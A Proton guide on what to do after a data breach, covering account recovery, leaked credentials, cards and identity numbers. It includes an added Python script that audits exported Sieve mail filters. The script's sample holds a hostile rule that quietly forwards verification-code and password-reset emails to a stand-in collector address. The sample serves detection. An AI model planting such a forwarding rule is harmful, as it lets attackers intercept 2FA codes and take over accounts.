Proton

What to do if your data is leaked?

In response to the growing number of data breaches, Proton Mail offers a feature to paid subscribers called Dark Web Monitoring. Our system checks if your credentials or other data have been leaked to illegal marketplaces and alerts you if so. Often a quick reaction to a data breach can protect your digital identity and prevent any losses.

The impact a breach can have on your life depends greatly on the type of information that was exposed and to whom.

There are two general classes of data breaches: those where the service that leaked your information is known, and those where it is not. Massive data breaches like those that have occurred at LinkedIn, Facebook, and X.com pose a different set of problems to those where a set of email/password combinations (combo lists) is sold or given away online by hackers.

This article includes general recommendations to mitigate the damage if your data leaks in a variety of scenarios. If you use Proton Mail’s Dark Web Monitoring service, we will give you actionable advice along with any breach notification you receive.

What is a data breach?

A data breach is when confidential, sensitive, or protected information is accessed or disclosed without authorization. This can involve the unintended release of personal data, such as social security numbers, credit card details, personal health information, or other personally identifiable information (PII). Data breaches can result from cybersecurity attacks, such as hacking or phishing, as well as from internal leaks or failures to secure data adequately.

Steps to take after a data breach

If the source of a data breach is known, you should immediately go to the service and check for any signs of unauthorized activity on your accounts, such as difficulty logging in, unexpected changes to security settings, receiving unfamiliar messages or notifications from your account, logins from unusual locations or at odd times, and unauthorized money transfers or purchases from your online accounts.

Some general steps to follow to secure a breached service include:

  1. If you’re unable to log in to the account, contact the provider’s customer support to try to regain access.
  2. If you have access, ensure your security settings, such as your recovery email, have not been changed. If they have, change them back.
  3. Change your password and use a password manager such as Proton Pass.
  4. Log all devices and apps out of your account.
  5. Set up two-factor authentication (2FA).
  6. If the breached service is an email provider, it’s important to review your email filtering and forwarding rules. Criminals often establish forwarding rules on compromised email accounts to receive copies of all incoming emails, enabling them to intercept 2FA codes or reset passwords, for instance.
  7. If the service is a communication system or social network more generally, it can be a good idea to notify contacts that you have been breached and for them to watch out for suspicious messages and posts.
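
The review in step 6 can be partly automated when the mail provider lets you export your filters as Sieve scripts (RFC 5228), which is an assumption here and not something this article states. The following added example (not Proton's code; the sample script, addresses and function names are constructed) lists every active redirect action and marks the ones that send mail outside your own domains:

```python
import re

# Constructed sample: a Sieve filter script as a mail provider might export it.
SAMPLE_SIEVE = r'''
require ["fileinto", "copy"];
# rule: newsletters
if header :contains "List-Id" "news.example.org" {
    fileinto "Newsletters";
}
# rule: added without the owner's knowledge
if anyof (header :contains "Subject" "verification code",
          header :contains "Subject" "password reset") {
    redirect :copy "collector@mailbox.invalid";
}
# rule: the owner's own forward to a second address
redirect "me@alias.example.com";
# redirect "old@elsewhere.invalid";
'''

# A quoted string, a '#' line comment, or a /* ... */ block comment.
_STRING_OR_COMMENT = re.compile(r'"(?:\\.|[^"\\])*"|#[^\n]*|/\*.*?\*/', re.S)
# redirect, optional tagged arguments such as :copy (RFC 3894), then the address.
_REDIRECT = re.compile(r'\bredirect\b((?:\s+:\w+)*)\s+"([^"\\]+)"\s*;')


def strip_comments(script):
    """Blank out comments but leave quoted strings untouched.

    Multi-line 'text:' strings are not handled in this sketch.
    """
    def keep_strings(match):
        token = match.group(0)
        return token if token.startswith('"') else " "
    return _STRING_OR_COMMENT.sub(keep_strings, script)


def audit_forwarding(script, own_domains):
    """Return one finding per active redirect action in the script."""
    own = {d.lower() for d in own_domains}
    findings = []
    for match in _REDIRECT.finditer(strip_comments(script)):
        tags, address = match.group(1).split(), match.group(2)
        domain = address.rsplit("@", 1)[-1].lower()
        findings.append({
            "address": address,
            "external": domain not in own,   # leaves the domains you control
            "keeps_copy": ":copy" in tags,   # inbox still looks normal to the owner
        })
    return findings


if __name__ == "__main__":
    for finding in audit_forwarding(SAMPLE_SIEVE, {"alias.example.com"}):
        print(finding)
```

A redirect that is both external and keeps a copy deserves the closest look, because the inbox shows nothing unusual while every matching message is also delivered elsewhere.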

Dealing with the aftermath of a data leak

Even if you manage to secure a breached account, your email address, password, credit card number, physical address, and other information could have been leaked at the same time.

While all leaked information has some level of potential damage, some information is clearly more valuable than others, in particular:

  • Email addresses: Your email address is your online identity, the passport all your accounts ask for when you log in. However, if your email address is all that’s exposed, you should be safe (hackers will still need to try to brute force your password to access your account).
    You should:
      • Remain vigilant for phishing emails, especially those that may arrive sometime after the breach becomes public knowledge. Look out for senders impersonating services that write to you regarding “resetting passwords”, “claiming compensation”, or “missed deliveries”. These, along with urgent requests to act immediately or within a limited timeframe, are red flags.
      • Enable 2FA, which is an excellent way to protect your account from attackers because even if they obtain your password they will still be unable to enter your account without an additional piece of information on your device.
      • Use hide-my-email aliases when signing up to sites to protect your identity.
  • Passwords: Exposed passwords, login credentials, or encryption keys can enable unauthorized entry into your accounts, potentially resulting in additional security breaches and data theft. While the exposure of plaintext passwords is generally more severe, some websites may store passwords using weak hashing methods like MD5, which can also leave your passwords vulnerable to attack. Conversely, passwords leaked from websites where passwords were encrypted or hashed using stronger algorithms such as SHA256 or bcrypt will inherently offer greater resistance to attacks.
    Therefore, if plaintext or weakly hashed passwords have been exposed, you must change them immediately. We strongly recommend using a password manager, such as Proton Pass, and 2FA wherever possible.
  • Credit card numbers: If your credit card number is leaked, you should put a hold on it immediately by calling the emergency number on the back of the card. It is also worth paying attention to your bank accounts and credit card statements and reporting any fraudulent transactions as soon as possible.
    If the source of the data breach is known, they will often provide subscriptions to credit monitoring software such as Experian so that you can mitigate financial risks.
  • Phone numbers: A leaked phone number can lead hackers to target you with phishing text messages, trying to catch you when you’re tired or not paying attention. You can protect yourself from spam calls in the UK with the Telephone Preference Service or in the US with the National Do Not Call Registry. Other countries likely have similar services, which you can search for online. In addition, be wary of phishing attempts.
  • Social Security numbers: Social Security numbers are an important piece of information, particularly in the US, and can be used along with your name, address, and date of birth to set up credit cards or take out loans in your name. If you find out your Social Security number has been stolen, you should immediately report the theft to identitytheft.gov, place a credit freeze, and add a fraud alert.

Though not exhaustive, this list covers the most commonly breached information. With almost 4,000 data breaches of 1.8 billion records happening in February 2024 alone, criminals are able to build up information about users across breaches to construct profiles containing not only your email addresses and passwords, but also your occupation, past employment, marital status, and more, making it easier to carry out more sophisticated phishing attacks. For example, this tool allows you to visualize your breach profile.

Use better encryption to prevent data leaks

Many data breaches could be prevented if more online services used end-to-end encryption. At Proton, this form of encryption is at the heart of our security architecture. Whether it’s protecting your emails and attachments in Proton Mail or securing your files in Proton Drive, your data is encrypted on your device before uploading to our servers. That way, if hackers ever were to gain access to our systems, your information would remain encrypted because only you can unlock your data with your private key.

Learn more about Proton’s end-to-end encryption
